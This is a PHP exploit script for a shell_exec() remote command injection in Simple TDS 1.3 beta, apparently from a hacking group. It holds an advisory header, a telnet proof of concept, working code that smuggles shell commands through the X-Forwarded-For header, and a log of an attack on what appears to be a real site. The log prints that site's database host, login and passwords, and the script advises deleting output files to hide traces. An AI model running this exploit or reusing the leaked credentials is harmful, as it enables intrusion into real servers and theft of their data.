[php]
<?php
/*
* 0x48k-stds13b-shellexec.php
* ========================
*
* EXPLOIT: Simple TDS <= 1.3 beta
* VULNERABILITY: shell_exec() Remote Command Injection Exploit
* WEB-SITE: hellknights.void.ru
*
* ADVISORY:
* =========
*
* User can inject commands to shell_exec() function via $ip (go.php script):
*
* line#45: $ip = @getip();
* line#57: $addr = @explode (‚ ‚, @shell_exec (“ . $geoip_path . ‚ ‚ . $ip));
*
* $ip value could be set via "X-Forwarded-For" HTTP web-server environment (get_ip() function begins at line#9):
*
* function getip ()
* {
* if ((@getenv(‚HTTP_CLIENT_IP‘) AND @strcasecmp(@getenv(‚HTTP_CLIENT_IP‘), ‚unknown‘)))
* {
* $ip = @getenv(‚HTTP_CLIENT_IP‘);
* }
* else
* {
* if ((@getenv(‚HTTP_X_FORWARDED_FOR‘) AND @strcasecmp(@getenv(‚HTTP_X_FORWARDED_FOR‘), ‚unknown‘)))
* {
* $ip = @getenv(‚HTTP_X_FORWARDED_FOR‘);
* }
* …
*
* Also hacker can use the "archive" directory (chmod 777) for command output.
*
* PROOF-OF-CONCEPT (reading config.php file):
* ===========================================
*
* $ telnet localhost 80
* GET /stds_1_3beta/go.php HTTP/1.0
* User-Agent: l33th4x0r
* X-Forwarded-For: 127.0.0.1; cat config.php > ./archive/tmp.txt
* Host: localhost
*
* $ GET http://localhost/stds_1_3beta/archive/tmp.txt
* <?php
*
* $mysql_host = "localhost";
* $mysql_login = "root";
* $mysql_password = "z3r0d4yy;
* $my_database = "stds";
*
* $password = "fhutynbyf";
* …
*/
// send http packet function
function SendPacket($host, $port, $packet, $recv)
{
$sock = fsockopen($host,$port,$errno,$errstr);
if (!$sock){
die("\ncant connect to remote server");
}
else
{
fputs ($sock, $packet);
if($recv)
{
while (!feof($sock))
{
$out=fgets($sock,99999);
echo $out;
}
}
}
fclose ($sock);
}
// string cut
function strxcut($string, $offset_from, $offset_to)
{
$str_to = NULL;
for($i=$offset_from; $i <= $offset_to; $i++)
{
$str_to .= $string[$i];
}
return $str_to;
}
// packet dump
function quick_dump($string)
{
$result=“;$exa=“;$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
// usage information
echo "\r\n";
echo "0x48k-stds13b-shellexec.php\r\n";
echo "========================\r\n\r\n";
echo "Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit\r\n";
echo "THIS IS PRIVATE EXPLOIT CODE, PLEASE DONT DISTRIBUTE\r\n";
echo "site: http://hellknights.void.ru/\r\n\r\n";
if ($argc<5)
{
echo "Usage: php ".$argv[0]." host port path output cmd\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "port: target web-server’s port\r\n";
echo "path: path to Simple TDS\r\n";
echo "output: output file (use ./archive/stats/index.html)\r\n";
echo "cmd: a shell command\r\n";
echo "\n\nExamples:\r\n";
echo "(1) READ CONFIG.PHP FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html cat config.php\r\n";
echo "(2) DONT FORGET TO DELETE OUTPUT FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html rm ./archive/index.html\r\n";
die;
}
// some configs
$user_agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)";
$get_root_index = "index.html";
$dump_output = TRUE; // FALSE;
$xforward_ip = "127.0.0.1";
echo "———————————–\r\n";
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$output = $argv[4];
$cmd = $argv[5];
$file_output = TRUE;
echo "host: ".$host."\r\n";
echo "port: ".$port."\r\n";
echo "path: ".$path."\r\n";
echo "output: ".$output."\r\n";
if($argc > 5)
{
for($i = 6; $i < $argc; $i++)
{
$cmd = $cmd." ".$argv[$i];
}
}
echo "cmd: ".$cmd."\r\n";
$cmd_inject = "$cmd";
// output to file ? (if rm output_file)
if($cmd == "rm $output" || $cmd == "del $output"){
$file_output = FALSE;
}
if($file_output){
$cmd_inject .= " > $output";
}
// output file (if ./archive/index.html, then GET /archive/ only)
$pos_to = strpos($output, $get_root_index);
if(!$pos_to){
$pos_to = strlen($output);
}
else{
$pos_to = $pos_to-1;
}
$pos_from = 0;
if($output[0].$output[1] == "./"){
$pos_from = 2;
}
else
if($output[0] == "/"){
$pos_from = 1;
}
$web_output = strxcut($output, $pos_from, $pos_to);
echo "———————————–\r\n";
// exploit
$packet = "GET ".$path."go.php HTTP/1.0\r\n".
"User-Agent: $user_agent\r\n".
"X-Forwarded-For: $xforward_ip; $cmd > $output\r\n".
"Host: $host\r\n\r\n";
echo "\r\n\r\n[+] sending exploit…\r\n\r\n";
if($dump_output) echo quick_dump($packet);
SendPacket($host, $port, $packet, FALSE);
$packet = "GET ".$path."$web_output HTTP/1.0\r\n".
"User-Agent: $user_agent\r\n".
"Host: $host\r\n\r\n";
if($file_output)
{
echo "\r\n\r\n[+] get command result from output file…\r\n\r\n";
if($dump_output) echo quick_dump($packet);
echo "\r\n\r\n";
SendPacket($host, $port, $packet, TRUE);
echo "\r\n\r\n[+] exploited.\ndont forget to delete output file: rm $output\r\n\r\n";
}
/*
EXPLOITING iyog.ru LOG:
### READING CONFIG FILE
[wrk] C:\$ C:\web\usr\bin\php5.exe C:\0x48k-stds13b-shellexec.php iyog.ru 80 / ./archive/stats/index.html cat config.php
0x48k-stds13b-shellexec.php
========================
Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit
THIS IS PRIVATE EXPLOIT CODE, PLEASE DONT DISTRIBUTE
by deadlock ([email protected])
site: http://hellknights.void.ru/
———————————–
host: iyog.ru
port: 80
path: /
output: ./archive/stats/index.html
cmd: cat config.php
———————————–
[+] sending exploit…
47 45 54 20 2f 67 6f 2e 70 68 70 20 48 54 54
50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65
6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30
20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 57
69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
72 75 3b 20 72 76 3a 31 2e 39 2e 32 2e 33 29
20 47 65 63 6b 6f 2f 32 30 31 30 30 34 30 31
20 46 69 72 65 66 6f 78 2f 33 2e 36 2e 33 20
28 2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 33
30 37 32 39 29 0d 0a 58 2d 46 6f 72 77 61 72
64 65 64 2d 46 6f 72 3a 20 31 32 37 2e 30 2e
30 2e 31 3b 20 63 61 74 20 63 6f 6e 66 69 67
2e 70 68 70 20 3e 20 2e 2f 61 72 63 68 69 76
65 2f 73 74 61 74 73 2f 69 6e 64 65 78 2e 68
74 6d 6c 0d 0a 48 6f 73 74 3a 20 69 79 6f 67
2e 72 75 0d 0a 0d 0a
G E T . / g o . p h p . H T T
P / 1 . 0 . . U s e r – A g e
n t : . M o z i l l a / 5 . 0
. ( W i n d o w s ; . U ; . W
i n d o w s . N T . 5 . 1 ; .
r u ; . r v : 1 . 9 . 2 . 3 )
. G e c k o / 2 0 1 0 0 4 0 1
. F i r e f o x / 3 . 6 . 3 .
( . N E T . C L R . 3 . 5 . 3
0 7 2 9 ) . . X – F o r w a r
d e d – F o r : . 1 2 7 . 0 .
0 . 1 ; . c a t . c o n f i g
. p h p . > . . / a r c h i v
e / s t a t s / i n d e x . h
t m l . . H o s t : . i y o g
. r u . . . .
[+] get command result from output file…
47 45 54 20 2f 61 72 63 68 69 76 65 2f 73 74
61 74 73 2f 20 48 54 54 50 2f 31 2e 30 0d 0a
55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a
69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f
77 73 3b 20 55 3b 20 57 69 6e 64 6f 77 73 20
4e 54 20 35 2e 31 3b 20 72 75 3b 20 72 76 3a
31 2e 39 2e 32 2e 33 29 20 47 65 63 6b 6f 2f
32 30 31 30 30 34 30 31 20 46 69 72 65 66 6f
78 2f 33 2e 36 2e 33 20 28 2e 4e 45 54 20 43
4c 52 20 33 2e 35 2e 33 30 37 32 39 29 0d 0a
48 6f 73 74 3a 20 69 79 6f 67 2e 72 75 0d 0a
0d 0a
G E T . / a r c h i v e / s t
a t s / . H T T P / 1 . 0 . .
U s e r – A g e n t : . M o z
i l l a / 5 . 0 . ( W i n d o
w s ; . U ; . W i n d o w s .
N T . 5 . 1 ; . r u ; . r v :
1 . 9 . 2 . 3 ) . G e c k o /
2 0 1 0 0 4 0 1 . F i r e f o
x / 3 . 6 . 3 . ( . N E T . C
L R . 3 . 5 . 3 0 7 2 9 ) . .
H o s t : . i y o g . r u . .
. .
HTTP/1.0 200 OK
Date: Sun, 11 Apr 2010 15:48:45 GMT
Server: Apache
Last-Modified: Sun, 11 Apr 2010 15:48:44 GMT
ETag: "2a6906-6db-483f7f6958f00"
Accept-Ranges: bytes
Content-Length: 1755
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
X-Cache: MISS from turbine0.ht-systems.ru
Connection: close
<?php
$mysql_host = "mysql-maxlibtt.ht-systems.ru:3306";
$mysql_login = "maxlibtt_natu";
$mysql_password = "264Uw4Kw";
$my_database = "maxlibtt_tds";
$password = "fhutynbyf"; //¦рЁюы№ фы фюёЄєяр ъ рфьшэъх ёъЁшяЄр
$debug = false; //LёЄрэютшЄ№ т true хёыш эєцхэ Ёхцшь юЄырфъш. T ¤Єюь Ёхцшь
х эх яЁюшёїюфшЄ ЁхфшЁхъЄ ЄЁрЇр.
$scripturl = "http://iyog.ru/"; //LЁы ёъЁшяЄр ё чръЁvтр¦•шь ёых°хь тъюэЎх.
$reserved_url = "http://www.google.com"; //¦хчхЁтэvщ єЁы, эр ъюЄюЁvщ ы№хЄё ЄЁрЇ
яЁш ю°шсърї
//(эх эрёЄЁюхэv рєЄv фы ёїхьv,
//эхяЁртшы№эvщ sid ёїхьv т чряЁюёх, ёыш°ъюь цхёЄъшх єёыютш Їшы№ЄЁют ш Є.ф.)
$nogeoip = "allow"; //+Єю фхырЄ№, хёыш эх юсэрЁєцхэ GeoIP, Є.х. хёыш
эх юяЁхфхышыё ъюф ёЄЁрэv
//+ёыш ттхёЄш allow – Єю тёх рєЄv сєфєЄ ЁрчЁх°х
эv (Є.х. ъръ сєфЄю є эшї яЁюяшёрэю ALL)
//+ёыш ттхёЄш block – Єю тёх эх-ALL рєЄv сєфєЄ
сыюъшЁютрэv
$geoip_path = "/usr/local/bin/geoiplookup"; //¦єЄ№ фю GeoIP. =хюсїюф
шь Єюы№ъю хёыш шчтхёЄэю, ўЄю эр їюёЄх ёЄюшЄ GeoIP,
//эю ёЄЁрэр эх юяЁхфхы х
Єё . LчэрЄ№ фрээvщ яєЄ№ ьюцэю є ёряяюЁЄр їюёЄшэур.
#### -ры№°х эх ЁхфръЄшЁютрЄ№ #########################
if ($debug) error_reporting(E_ALL); else error_reporting(0);
@ignore_user_abort (true);
mysql_connect($mysql_host, $mysql_login, $mysql_password)
or die ("Could not connect to MySQL");
mysql_select_db ($my_database)
or die ("Could not select database");
//+Єхэшх эрёЄЁюхъ Simple tDS
$global_settings = array();
$qu = "SELECT * FROM `settings`";
$result = mysql_query ($qu); //+шЄрхь тёх эрёЄЁющъш…
while ($line = mysql_fetch_array($result)){
$name=$line[’name‘];
$val = $line[‚value‘];
$global_settings[$name] = $val;
}
//¦юэхЎ ўЄхэш эрёЄЁюхъ
?>
[+] exploited.
dont forget to delete output file: rm ./archive/stats/index.html
## DELETE OUTPUT FILE
[wrk] C:\lproj\stxbot$ C:\web\usr\bin\php5.exe C:\0x48k-stds13b-shellexec.php iyog.ru 80 / ./archive/stats/index.html rm ./archive/stats/index.html
0x48k-stds13b-shellexec.php
========================
Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit
THIS IS PRIVATE EXPLOIT CODE, PLEASE DONT DISTRIBUTE
by deadlock ([email protected])
site: http://hellknights.void.ru/
———————————–
host: iyog.ru
port: 80
path: /
output: ./archive/stats/index.html
cmd: rm ./archive/stats/index.html
———————————–
[+] sending exploit…
47 45 54 20 2f 67 6f 2e 70 68 70 20 48 54 54
50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65
6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30
20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 57
69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
72 75 3b 20 72 76 3a 31 2e 39 2e 32 2e 33 29
20 47 65 63 6b 6f 2f 32 30 31 30 30 34 30 31
20 46 69 72 65 66 6f 78 2f 33 2e 36 2e 33 20
28 2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 33
30 37 32 39 29 0d 0a 58 2d 46 6f 72 77 61 72
64 65 64 2d 46 6f 72 3a 20 31 32 37 2e 30 2e
30 2e 31 3b 20 72 6d 20 2e 2f 61 72 63 68 69
76 65 2f 73 74 61 74 73 2f 69 6e 64 65 78 2e
68 74 6d 6c 20 3e 20 2e 2f 61 72 63 68 69 76
65 2f 73 74 61 74 73 2f 69 6e 64 65 78 2e 68
74 6d 6c 0d 0a 48 6f 73 74 3a 20 69 79 6f 67
2e 72 75 0d 0a 0d 0a
G E T . / g o . p h p . H T T
P / 1 . 0 . . U s e r – A g e
n t : . M o z i l l a / 5 . 0
. ( W i n d o w s ; . U ; . W
i n d o w s . N T . 5 . 1 ; .
r u ; . r v : 1 . 9 . 2 . 3 )
. G e c k o / 2 0 1 0 0 4 0 1
. F i r e f o x / 3 . 6 . 3 .
( . N E T . C L R . 3 . 5 . 3
0 7 2 9 ) . . X – F o r w a r
d e d – F o r : . 1 2 7 . 0 .
0 . 1 ; . r m . . / a r c h i
v e / s t a t s / i n d e x .
h t m l . > . . / a r c h i v
e / s t a t s / i n d e x . h
t m l . . H o s t : . i y o g
. r u . . . .
*/
?>
[/php]
